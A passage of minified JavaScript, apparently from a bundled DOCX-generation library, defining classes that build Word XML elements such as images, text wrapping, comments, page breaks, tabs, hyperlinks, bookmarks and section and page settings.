b{constructor(){super(...arguments),this.xmlKeys={embed:"r:embed",cstate:"cstate"}}}class bo extends E{constructor(Ce){super("a:blip"),this.root.push(new ao({embed:`rId{${Ce.fileName}}`,cstate:"none"}))}}class $n extends E{constructor(){super("a:srcRect")}}class Do extends E{constructor(){super("a:fillRect")}}class Mo extends E{constructor(){super("a:stretch"),this.root.push(new Do)}}class no extends E{constructor(Ce){super("pic:blipFill"),this.root.push(new bo(Ce)),this.root.push(new $n),this.root.push(new Mo)}}class Kn extends b{constructor(){super(...arguments),this.xmlKeys={noChangeAspect:"noChangeAspect",noChangeArrowheads:"noChangeArrowheads"}}}class Sa extends E{constructor(){super("a:picLocks"),this.root.push(new Kn({noChangeAspect:1,noChangeArrowheads:1}))}}class ra extends E{constructor(){super("pic:cNvPicPr"),this.root.push(new Sa)}}class Bd extends b{constructor(){super(...arguments),this.xmlKeys={id:"id",name:"name",descr:"descr"}}}class cl extends E{constructor(){super("pic:cNvPr"),this.root.push(new Bd({id:0,name:"",descr:""}))}}class Bn extends E{constructor(){super("pic:nvPicPr"),this.root.push(new cl),this.root.push(new ra)}}class Hd extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns:pic"}}}class Wo extends b{constructor(){super(...arguments),this.xmlKeys={cx:"cx",cy:"cy"}}}class ss extends E{constructor(Ce,nt){super("a:ext"),this.attributes=new Wo({cx:Ce,cy:nt}),this.root.push(this.attributes)}}class w2 extends b{constructor(){super(...arguments),this.xmlKeys={x:"x",y:"y"}}}class ja extends E{constructor(){super("a:off"),this.root.push(new w2({x:0,y:0}))}}class La extends b{constructor(){super(...arguments),this.xmlKeys={flipVertical:"flipV",flipHorizontal:"flipH",rotation:"rot"}}}class Kp extends E{constructor(Ce){var nt,Dt;super("a:xfrm"),this.root.push(new La({flipVertical:null===(nt=Ce.flip)||void 0===nt?void 0:nt.vertical,flipHorizontal:null===(Dt=Ce.flip)||void 0===Dt?void 0:Dt.horizontal,rotation:Ce.rotation})),this.extents=new ss(Ce.emus.x,Ce.emus.y),this.root.push(new ja),this.root.push(this.extents)}}class DM extends E{constructor(){super("a:avLst")}}class gi extends b{constructor(){super(...arguments),this.xmlKeys={prst:"prst"}}}class bf extends E{constructor(){super("a:prstGeom"),this.root.push(new gi({prst:"rect"})),this.root.push(new DM)}}class Qa extends b{constructor(){super(...arguments),this.xmlKeys={bwMode:"bwMode"}}}class Hn extends E{constructor(Ce){super("pic:spPr"),this.root.push(new Qa({bwMode:"auto"})),this.form=new Kp(Ce),this.root.push(this.form),this.root.push(new bf)}}class I2 extends E{constructor(Ce,nt){super("pic:pic"),this.root.push(new Hd({xmlns:"http://schemas.openxmlformats.org/drawingml/2006/picture"})),this.root.push(new Bn),this.root.push(new no(Ce)),this.root.push(new Hn(nt))}}class R2 extends E{constructor(Ce,nt){super("a:graphicData"),this.root.push(new lo({uri:"http://schemas.openxmlformats.org/drawingml/2006/picture"})),this.pic=new I2(Ce,nt),this.root.push(this.pic)}}class S2 extends b{constructor(){super(...arguments),this.xmlKeys={a:"xmlns:a"}}}class Vu extends E{constructor(Ce,nt){super("a:graphic"),this.root.push(new S2({a:"http://schemas.openxmlformats.org/drawingml/2006/main"})),this.data=new R2(Ce,nt),this.root.push(this.data)}}(function(Se){Se[Se.NONE=0]="NONE",Se[Se.SQUARE=1]="SQUARE",Se[Se.TIGHT=2]="TIGHT",Se[Se.TOP_AND_BOTTOM=3]="TOP_AND_BOTTOM"})(Gt||(Gt={})),function(Se){Se.BOTH_SIDES="bothSides",Se.LEFT="left",Se.RIGHT="right",Se.LARGEST="largest"}(Co||(Co={}));class cs extends E{constructor(){super("wp:wrapNone")}}class Zg extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR",wrapText:"wrapText"}}}class nd extends E{constructor(Ce,nt={top:0,bottom:0,left:0,right:0}){super("wp:wrapSquare"),this.root.push(new Zg({wrapText:Ce.side||Co.BOTH_SIDES,distT:nt.top,distB:nt.bottom,distL:nt.left,distR:nt.right}))}}class xM extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB"}}}class ll extends E{constructor(Ce={top:0,bottom:0}){super("wp:wrapTight"),this.root.push(new xM({distT:Ce.top,distB:Ce.bottom}))}}class wM extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB"}}}class Bu extends E{constructor(Ce={top:0,bottom:0}){super("wp:wrapTopAndBottom"),this.root.push(new wM({distT:Ce.top,distB:Ce.bottom}))}}class IM extends b{constructor(){super(...arguments),this.xmlKeys={id:"id",name:"name",descr:"descr"}}}class k2 extends E{constructor(){super("wp:docPr"),this.root.push(new IM({id:0,name:"",descr:""}))}}class P2 extends b{constructor(){super(...arguments),this.xmlKeys={b:"b",l:"l",r:"r",t:"t"}}}class O2 extends E{constructor(){super("wp:effectExtent"),this.root.push(new P2({b:0,l:0,r:0,t:0}))}}class N2 extends b{constructor(){super(...arguments),this.xmlKeys={cx:"cx",cy:"cy"}}}class L2 extends E{constructor(Ce,nt){super("wp:extent"),this.attributes=new N2({cx:Ce,cy:nt}),this.root.push(this.attributes)}}class mr extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns:a",noChangeAspect:"noChangeAspect"}}}class mo extends E{constructor(){super("a:graphicFrameLocks"),this.root.push(new mr({xmlns:"http://schemas.openxmlformats.org/drawingml/2006/main",noChangeAspect:1}))}}class e0 extends E{constructor(){super("wp:cNvGraphicFramePr"),this.root.push(new mo)}}class z2 extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR",allowOverlap:"allowOverlap",behindDoc:"behindDoc",layoutInCell:"layoutInCell",locked:"locked",relativeHeight:"relativeHeight",simplePos:"simplePos"}}}class RM extends E{constructor(Ce,nt,Dt){super("wp:anchor");const di=Object.assign({allowOverlap:!0,behindDocument:!1,lockAnchor:!1,layoutInCell:!0,verticalPosition:{},horizontalPosition:{}},Dt.floating);if(this.root.push(new z2({distT:di.margins&&di.margins.top||0,distB:di.margins&&di.margins.bottom||0,distL:di.margins&&di.margins.left||0,distR:di.margins&&di.margins.right||0,simplePos:"0",allowOverlap:!0===di.allowOverlap?"1":"0",behindDoc:!0===di.behindDocument?"1":"0",locked:!0===di.lockAnchor?"1":"0",layoutInCell:!0===di.layoutInCell?"1":"0",relativeHeight:di.zIndex?di.zIndex:nt.emus.y})),this.root.push(new Va),this.root.push(new Vn(di.horizontalPosition)),this.root.push(new Pn(di.verticalPosition)),this.root.push(new L2(nt.emus.x,nt.emus.y)),this.root.push(new O2),void 0!==Dt.floating&&void 0!==Dt.floating.wrap)switch(Dt.floating.wrap.type){case Gt.SQUARE:this.root.push(new nd(Dt.floating.wrap,Dt.floating.margins));break;case Gt.TIGHT:this.root.push(new ll(Dt.floating.margins));break;case Gt.TOP_AND_BOTTOM:this.root.push(new Bu(Dt.floating.margins));break;default:this.root.push(new cs)}else this.root.push(new cs);this.root.push(new k2),this.root.push(new e0),this.root.push(new Vu(Ce,nt))}}class hi extends b{constructor(){super(...arguments),this.xmlKeys={distT:"distT",distB:"distB",distL:"distL",distR:"distR"}}}class SM extends E{constructor(Ce,nt){super("wp:inline"),this.root.push(new hi({distT:0,distB:0,distL:0,distR:0})),this.extent=new L2(nt.emus.x,nt.emus.y),this.graphic=new Vu(Ce,nt),this.root.push(this.extent),this.root.push(new O2),this.root.push(new k2),this.root.push(new e0),this.root.push(this.graphic)}}class Ci extends E{constructor(Ce,nt={}){super("w:drawing"),nt.floating?this.root.push(new RM(Ce,Ce.transformation,nt)):(this.inline=new SM(Ce,Ce.transformation),this.root.push(this.inline))}}class Hu extends pt{constructor(Ce){super({}),this.key=`${(0,ha.EL)()}.png`;const nt="string"==typeof Ce.data?this.convertDataURIToBinary(Ce.data):Ce.data;this.imageData={stream:nt,fileName:this.key,transformation:{pixels:{x:Math.round(Ce.transformation.width),y:Math.round(Ce.transformation.height)},emus:{x:Math.round(9525*Ce.transformation.width),y:Math.round(9525*Ce.transformation.height)},flip:Ce.transformation.flip,rotation:Ce.transformation.rotation?6e4*Ce.transformation.rotation:void 0}};const Dt=new Ci(this.imageData,{floating:Ce.floating});this.root.push(Dt)}prepForXml(Ce){return Ce.file.Media.addImage(this.key,this.imageData),super.prepForXml(Ce)}convertDataURIToBinary(Ce){const nt=";base64,",Dt=Ce.indexOf(nt)+nt.length;return"function"==typeof atob?new Uint8Array(atob(Ce.substring(Dt)).split("").map(di=>di.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}class t0 extends E{constructor(Ce){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(`SEQ ${Ce}`)}}class a0 extends pt{constructor(Ce){super({}),this.root.push(new Ue(!0)),this.root.push(new t0(Ce)),this.root.push(new Xe),this.root.push(new He)}}class W2 extends E{constructor(){super("w:tab")}}class ls extends b{constructor(){super(...arguments),this.xmlKeys={instr:"w:instr"}}}class Xp extends E{constructor(Ce,nt){super("w:fldSimple"),this.root.push(new ls({instr:Ce})),void 0!==nt&&this.root.push(new vt(nt))}}class Ll extends Xp{constructor(Ce){super(` MERGEFIELD ${Ce} `,`\xab${Ce}\xbb`)}}class Yp extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",initials:"w:initials",author:"w:author",date:"w:date"}}}class Mf extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class F2 extends b{constructor(){super(...arguments),this.xmlKeys={"xmlns:cx":"xmlns:cx","xmlns:cx1":"xmlns:cx1","xmlns:cx2":"xmlns:cx2","xmlns:cx3":"xmlns:cx3","xmlns:cx4":"xmlns:cx4","xmlns:cx5":"xmlns:cx5","xmlns:cx6":"xmlns:cx6","xmlns:cx7":"xmlns:cx7","xmlns:cx8":"xmlns:cx8","xmlns:mc":"xmlns:mc","xmlns:aink":"xmlns:aink","xmlns:am3d":"xmlns:am3d","xmlns:o":"xmlns:o","xmlns:r":"xmlns:r","xmlns:m":"xmlns:m","xmlns:v":"xmlns:v","xmlns:wp14":"xmlns:wp14","xmlns:wp":"xmlns:wp","xmlns:w10":"xmlns:w10","xmlns:w":"xmlns:w","xmlns:w14":"xmlns:w14","xmlns:w15":"xmlns:w15","xmlns:w16cex":"xmlns:w16cex","xmlns:w16cid":"xmlns:w16cid","xmlns:w16":"xmlns:w16","xmlns:w16sdtdh":"xmlns:w16sdtdh","xmlns:w16se":"xmlns:w16se","xmlns:wpg":"xmlns:wpg","xmlns:wpi":"xmlns:wpi","xmlns:wne":"xmlns:wne","xmlns:wps":"xmlns:wps"}}}class Da extends E{constructor(Ce){super("w:commentRangeStart"),this.root.push(new Mf({id:Ce}))}}class Vm extends E{constructor(Ce){super("w:commentRangeEnd"),this.root.push(new Mf({id:Ce}))}}class vf extends E{constructor(Ce){super("w:commentReference"),this.root.push(new Mf({id:Ce}))}}class Bs extends E{constructor({id:Ce,initials:nt,author:Dt,date:di=new Date,text:pi}){super("w:comment"),this.root.push(new Yp({id:Ce,initials:nt,author:Dt,date:di.toISOString()})),this.root.push(new uc({children:[new vt(pi)]}))}}class Jp extends E{constructor({children:Ce}){super("w:comments"),this.root.push(new F2({"xmlns:cx":"http://schemas.microsoft.com/office/drawing/2014/chartex","xmlns:cx1":"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex","xmlns:cx2":"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex","xmlns:cx3":"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex","xmlns:cx4":"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex","xmlns:cx5":"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex","xmlns:cx6":"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex","xmlns:cx7":"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex","xmlns:cx8":"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex","xmlns:mc":"http://schemas.openxmlformats.org/markup-compatibility/2006","xmlns:aink":"http://schemas.microsoft.com/office/drawing/2016/ink","xmlns:am3d":"http://schemas.microsoft.com/office/drawing/2017/model3d","xmlns:o":"urn:schemas-microsoft-com:office:office","xmlns:r":"http://schemas.openxmlformats.org/officeDocument/2006/relationships","xmlns:m":"http://schemas.openxmlformats.org/officeDocument/2006/math","xmlns:v":"urn:schemas-microsoft-com:vml","xmlns:wp14":"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing","xmlns:wp":"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing","xmlns:w10":"urn:schemas-microsoft-com:office:word","xmlns:w":"http://schemas.openxmlformats.org/wordprocessingml/2006/main","xmlns:w14":"http://schemas.microsoft.com/office/word/2010/wordml","xmlns:w15":"http://schemas.microsoft.com/office/word/2012/wordml","xmlns:w16cex":"http://schemas.microsoft.com/office/word/2018/wordml/cex","xmlns:w16cid":"http://schemas.microsoft.com/office/word/2016/wordml/cid","xmlns:w16":"http://schemas.microsoft.com/office/word/2018/wordml","xmlns:w16sdtdh":"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash","xmlns:w16se":"http://schemas.microsoft.com/office/word/2015/wordml/symex","xmlns:wpg":"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup","xmlns:wpi":"http://schemas.microsoft.com/office/word/2010/wordprocessingInk","xmlns:wne":"http://schemas.microsoft.com/office/word/2006/wordml","xmlns:wps":"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}));for(const nt of Ce)this.root.push(new Bs(nt))}}!function(Se){Se.COLUMN="column",Se.PAGE="page"}(jt||(jt={}));class od extends E{constructor(Ce){super("w:br"),this.root.push(new _({type:Ce}))}}class Pc extends pt{constructor(){super({}),this.root.push(new od(jt.PAGE))}}class ec extends pt{constructor(){super({}),this.root.push(new od(jt.COLUMN))}}class V2 extends E{constructor(){super("w:pageBreakBefore")}}!function(Se){Se.AT_LEAST="atLeast",Se.EXACTLY="exactly",Se.AUTO="auto"}(qt||(qt={}));class kM extends b{constructor(){super(...arguments),this.xmlKeys={after:"w:after",before:"w:before",line:"w:line",lineRule:"w:lineRule"}}}class dc extends E{constructor(Ce){super("w:spacing"),this.root.push(new kM(Ce))}}!function(Se){Se.HEADING_1="Heading1",Se.HEADING_2="Heading2",Se.HEADING_3="Heading3",Se.HEADING_4="Heading4",Se.HEADING_5="Heading5",Se.HEADING_6="Heading6",Se.TITLE="Title"}(Qn||(Qn={}));class vo extends E{constructor(Ce){super("w:pStyle"),this.root.push(new _({val:Ce}))}}class Zp extends E{constructor(Ce,nt,Dt){super("w:tabs"),this.root.push(new Ud(Ce,nt,Dt))}}(function(Se){Se.LEFT="left",Se.RIGHT="right",Se.CENTER="center",Se.BAR="bar",Se.CLEAR="clear",Se.DECIMAL="decimal",Se.END="end",Se.NUM="num",Se.START="start"})(Kt||(Kt={})),function(Se){Se.DOT="dot",Se.HYPHEN="hyphen",Se.MIDDLE_DOT="middleDot",Se.NONE="none",Se.UNDERSCORE="underscore"}(Zt||(Zt={})),function(Se){Se[Se.MAX=9026]="MAX"}(Bo||(Bo={}));class B2 extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",pos:"w:pos",leader:"w:leader"}}}class Ud extends E{constructor(Ce,nt,Dt){super("w:tab"),this.root.push(new B2({val:Ce,pos:nt,leader:Dt}))}}class Xn extends E{constructor(Ce,nt){super("w:numPr"),this.root.push(new Af(nt)),this.root.push(new e_(Ce))}}class Af extends E{constructor(Ce){if(super("w:ilvl"),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new _({val:Ce}))}}class e_ extends E{constructor(Ce){super("w:numId"),this.root.push(new _({val:"string"==typeof Ce?`{${Ce}}`:Ce}))}}class t_ extends b{constructor(){super(...arguments),this.xmlKeys={id:"Id",type:"Type",target:"Target",targetMode:"TargetMode"}}}!function(Se){Se.EXTERNAL="External"}(ti||(ti={}));class n0 extends E{constructor(Ce,nt,Dt,di){super("Relationship"),this.root.push(new t_({id:Ce,type:nt,target:Dt,targetMode:di}))}}class mc extends b{constructor(){super(...arguments),this.xmlKeys={id:"r:id",history:"w:history",anchor:"w:anchor"}}}!function(Se){Se.INTERNAL="INTERNAL",Se.EXTERNAL="EXTERNAL"}(ii||(ii={}));class qd extends E{constructor(Ce,nt,Dt){super("w:hyperlink"),this.linkId=nt;const pi=new mc({history:1,anchor:Dt||void 0,id:Dt?void 0:`rId${this.linkId}`});this.root.push(pi),Ce.forEach(Hi=>{this.root.push(Hi)})}}class H2 extends qd{constructor(Ce){super(Ce.children,(0,ha.EL)(),Ce.anchor)}}class Wt extends E{constructor(Ce){super("w:externalHyperlink"),this.options=Ce}}class Ds extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",name:"w:name"}}}class o0 extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class i_{constructor(Ce){const nt=(0,ha.NY)();this.start=new yi(Ce.id,nt),this.children=Ce.children,this.end=new r0(nt)}}class yi extends E{constructor(Ce,nt){super("w:bookmarkStart");const Dt=new Ds({name:Ce,id:nt});this.root.push(Dt)}}class r0 extends E{constructor(Ce){super("w:bookmarkEnd");const nt=new o0({id:Ce});this.root.push(nt)}}class Uu extends E{constructor(Ce){super("w:outlineLvl"),this.level=Ce,this.root.push(new _({val:Ce}))}}class Ot extends E{constructor(Ce,nt={}){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE}));let Dt=`PAGEREF ${Ce}`;nt.hyperlink&&(Dt=`${Dt} \\h`),nt.useRelativePosition&&(Dt=`${Dt} \\p`),this.root.push(Dt)}}class Fr extends pt{constructor(Ce,nt={}){super({children:[new Ue(!0),new Ot(Ce,nt),new He]})}}!function(Se){Se.BOTTOM="bottom",Se.CENTER="center",Se.TOP="top"}(pn||(pn={}));class Un extends b{constructor(){super(...arguments),this.xmlKeys={verticalAlign:"w:val"}}}class ur extends E{constructor(Ce){super("w:vAlign"),this.root.push(new Un({verticalAlign:Ce}))}}!function(Se){Se.DEFAULT="default",Se.FIRST="first",Se.EVEN="even"}(Pt||(Pt={}));class tn extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"r:id"}}}!function(Se){Se.HEADER="w:headerReference",Se.FOOTER="w:footerReference"}(Xt||(Xt={}));class zl extends E{constructor(Ce,nt){super(Ce),this.root.push(new tn({type:nt.type||Pt.DEFAULT,id:`rId${nt.id}`}))}}class ds extends b{constructor(){super(...arguments),this.xmlKeys={space:"w:space",count:"w:num",separate:"w:sep",equalWidth:"w:equalWidth"}}}class Bm extends E{constructor({space:Ce,count:nt,separate:Dt,equalWidth:di,children:pi}){super("w:cols"),this.root.push(new ds({space:void 0===Ce?void 0:(0,z.Jd)(Ce),count:void 0===nt?void 0:(0,z.vH)(nt),separate:Dt,equalWidth:di})),!di&&pi&&pi.forEach(Hi=>this.addChildElement(Hi))}}!function(Se){Se.DEFAULT="default",Se.LINES="lines",Se.LINES_AND_CHARS="linesAndChars",Se.SNAP_TO_CHARS="snapToChars"}(Ho||(Ho={}));class Wl extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",linePitch:"w:linePitch",charSpace:"w:charSpace"}}}class xs extends E{constructor(Ce,nt,Dt){super("w:docGrid"),this.root.push(new Wl({type:Dt,linePitch:(0,z.vH)(Ce),charSpace:nt?(0,z.vH)(nt):void 0}))}}!function(Se){Se.NEW_PAGE="newPage",Se.NEW_SECTION="newSection",Se.CONTINUOUS="continuous"}(Qt||(Qt={}));class qu extends b{constructor(){super(...arguments),this.xmlKeys={countBy:"w:countBy",start:"w:start",restart:"w:restart",distance:"w:distance"}}}class ws extends E{constructor({countBy:Ce,start:nt,restart:Dt,distance:di}){super("w:lnNumType"),this.root.push(new qu({countBy:void 0===Ce?void 0:(0,z.vH)(Ce),start:void 0===nt?void 0:(0,z.vH)(nt),restart:Dt,distance:void 0===di?void 0:(0,z.Jd)(di)}))}}(function(Se){Se.ALL_PAGES="allPages",Se.FIRST_PAGE="firstPage",Se.NOT_FIRST_PAGE="notFirstPage"})(ei||(ei={})),function(Se){Se.PAGE="page",Se.TEXT="text"}($o||($o={})),function(Se){Se.BACK="back",Se.FRONT="front"}(ai||(ai={}));class In extends b{constructor(){super(...arguments),this.xmlKeys={display:"w:display",offsetFrom:"w:offsetFrom",zOrder:"w:zOrder"}}}class a_ extends g{constructor(Ce){super("w:pgBorders"),Ce&&(this.root.push(new In(Ce.pageBorders?{display:Ce.pageBorders.display,offsetFrom:Ce.pageBorders.offsetFrom,zOrder:Ce.pageBorders.zOrder}:{})),Ce.pageBorderTop&&this.root.push(new L("w:top",Ce.pageBorderTop)),Ce.pageBorderLeft&&this.root.push(new L("w:left",Ce.pageBorderLeft)),Ce.pageBorderBottom&&this.root.push(new L("w:bottom",Ce.pageBorderBottom)),Ce.pageBorderRight&&this.root.push(new L("w:right",Ce.pageBorderRight)))}}class xo extends b{constructor(){super(...arguments),this.xmlKeys={top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter"}}}class Vi extends E{constructor(Ce,nt,Dt,di,pi,Hi,_a){super("w:pgMar"),this.root.push(new xo({top:(0,z.xb)(Ce),right:(0,z.Jd)(nt),bottom:(0,z.xb)(Dt),left:(0,z.Jd)(di),header:(0,z.Jd)(pi),footer:(0,z.Jd)(Hi),gutter:(0,z.Jd)(_a)}))}}!function(Se){Se.HYPHEN="hyphen",Se.PERIOD="period",Se.COLON="colon",Se.EM_DASH="emDash",Se.EN_DASH="endash"}($t||($t={}));class Ia extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",formatType:"w:fmt",separator:"w:chapSep"}}}class wo extends E{constructor({start:Ce,formatType:nt,separator:Dt}){super("w:pgNumType"),this.root.push(new Ia({start:void 0===Ce?void 0:(0,z.vH)(Ce),formatType:nt,separator:Dt}))}}!function(Se){Se.PORTRAIT="portrait",Se.LANDSCAPE="landscape"}(zo||(zo={}));class _n extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",height:"w:h",orientation:"w:orient"}}}class Fl extends E{constructor(Ce,nt,Dt){super("w:pgSz");const di=Dt===zo.LANDSCAPE,pi=(0,z.Jd)(Ce),Hi=(0,z.Jd)(nt);this.root.push(new _n({width:di?Hi:pi,height:di?pi:Hi,orientation:Dt}))}}!function(Se){Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Ut||(Ut={}));class Rr extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Vl extends E{constructor(Ce){super("w:textDirection"),this.root.push(new Rr({val:Ce}))}}!function(Se){Se.NEXT_PAGE="nextPage",Se.NEXT_COLUMN="nextColumn",Se.CONTINUOUS="continuous",Se.EVEN_PAGE="evenPage",Se.ODD_PAGE="oddPage"}(Yt||(Yt={}));class er extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Bl extends E{constructor(Ce){super("w:type"),this.root.push(new er({val:Ce}))}}const tc={TOP:"1in",RIGHT:"1in",BOTTOM:"1in",LEFT:"1in",HEADER:708,FOOTER:708,GUTTER:0},$a={WIDTH:11906,HEIGHT:16838,ORIENTATION:zo.PORTRAIT};class ms extends E{constructor({page:{size:{width:Ce=$a.WIDTH,height:nt=$a.HEIGHT,orientation:Dt=$a.ORIENTATION}={},margin:{top:di=tc.TOP,right:pi=tc.RIGHT,bottom:Hi=tc.BOTTOM,left:_a=tc.LEFT,header:Ya=tc.HEADER,footer:ca=tc.FOOTER,gutter:ka=tc.GUTTER}={},pageNumbers:Dr={},borders:Ao,textDirection:sr}={},grid:{linePitch:Fc=360,charSpace:At,type:gc}={},headerWrapperGroup:Po={},footerWrapperGroup:Vf={},lineNumbers:eu,titlePage:dh,verticalAlign:mh,column:z_,type:uh}={}){super("w:sectPr"),this.addHeaderFooterGroup(Xt.HEADER,Po),this.addHeaderFooterGroup(Xt.FOOTER,Vf),uh&&this.root.push(new Bl(uh)),this.root.push(new Fl(Ce,nt,Dt)),this.root.push(new Vi(di,pi,Hi,_a,Ya,ca,ka)),Ao&&this.root.push(new a_(Ao)),eu&&this.root.push(new ws(eu)),this.root.push(new wo(Dr)),z_&&this.root.push(new Bm(z_)),mh&&this.root.push(new ur(mh)),void 0!==dh&&this.root.push(new l("w:titlePg",dh)),sr&&this.root.push(new Vl(sr)),this.root.push(new xs(Fc,At,gc))}addHeaderFooterGroup(Ce,nt){nt.default&&this.root.push(new zl(Ce,{type:Pt.DEFAULT,id:nt.default.View.ReferenceId})),nt.first&&this.root.push(new zl(Ce,{type:Pt.FIRST,id:nt.first.View.ReferenceId})),nt.even&&this.root.push(new zl(Ce,{type:Pt.EVEN,id:nt.even.View.ReferenceId}))}}class Hs extends E{constructor(){super("w:body"),this.sections=[]}addSection(Ce){const nt=this.sections.pop();this.root.push(this.createSectionParagraph(nt)),this.sections.push(new ms(Ce))}prepForXml(Ce){return 1===this.sections.length&&(this.root.splice(0,1),this.root.push(this.sections.pop())),super.prepForXml(Ce)}push(Ce){this.root.push(Ce)}createSectionParagraph(Ce){const nt=new uc({}),Dt=new dl({});return Dt.push(Ce),nt.addChildElement(Dt),nt}}class Oc extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",space:"w:space"}}}class tr extends E{constructor({width:Ce,space:nt}){super("w:col"),this.root.push(new Oc({width:(0,z.Jd)(Ce),space:void 0===nt?void 0:(0,z.Jd)(nt)}))}}class ko extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type",cx:"xmlns:cx",cx1:"xmlns:cx1",cx2:"xmlns:cx2",cx3:"xmlns:cx3",cx4:"xmlns:cx4",cx5:"xmlns:cx5",cx6:"xmlns:cx6",cx7:"xmlns:cx7",cx8:"xmlns:cx8",aink:"xmlns:aink",am3d:"xmlns:am3d",w16cex:"xmlns:w16cex",w16cid:"xmlns:w16cid",w16:"xmlns:w16",w16sdtdh:"xmlns:w16sdtdh",w16se:"xmlns:w16se"}}}class Gd extends b{constructor(){super(...arguments),this.xmlKeys={color:"w:color",themeColor:"w:themeColor",themeShade:"w:themeShade",themeTint:"w:themeTint"}}}class rd extends E{constructor(Ce){super("w:background"),this.root.push(new Gd({color:void 0===Ce.color?void 0:(0,z.dg)(Ce.color),themeColor:Ce.themeColor,themeShade:void 0===Ce.themeShade?void 0:(0,z.xD)(Ce.themeShade),themeTint:void 0===Ce.themeTint?void 0:(0,z.xD)(Ce.themeTint)}))}}class ic extends E{constructor(Ce){super("w:document"),this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",cx:"http://schemas.microsoft.com/office/drawing/2014/chartex",cx1:"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex",cx2:"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex",cx3:"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex",cx4:"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex",cx5:"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex",cx6:"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex",cx7:"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex",cx8:"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex",aink:"http://schemas.microsoft.com/office/drawing/2016/ink",am3d:"http://schemas.microsoft.com/office/drawing/2017/model3d",w16cex:"http://schemas.microsoft.com/office/word/2018/wordml/cex",w16cid:"http://schemas.microsoft.com/office/word/2016/wordml/cid",w16:"http://schemas.microsoft.com/office/word/2018/wordml",w16sdtdh:"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash",w16se:"http://schemas.microsoft.com/office/word/2015/wordml/symex",Ignorable:"w14 w15 wp14"})),this.body=new Hs,this.root.push(new rd(Ce.background)),this.root.push(this.body)}add(Ce){return this.body.push(Ce),this}get Body(){return this.body}}class jd extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Hm extends E{constructor(){super("Relationships"),this.root.push(new jd({xmlns:"http://schemas.openxmlformats.org/package/2006/relationships"}))}addRelationship(Ce){this.root.push(Ce)}createRelationship(Ce,nt,Dt,di){const pi=new 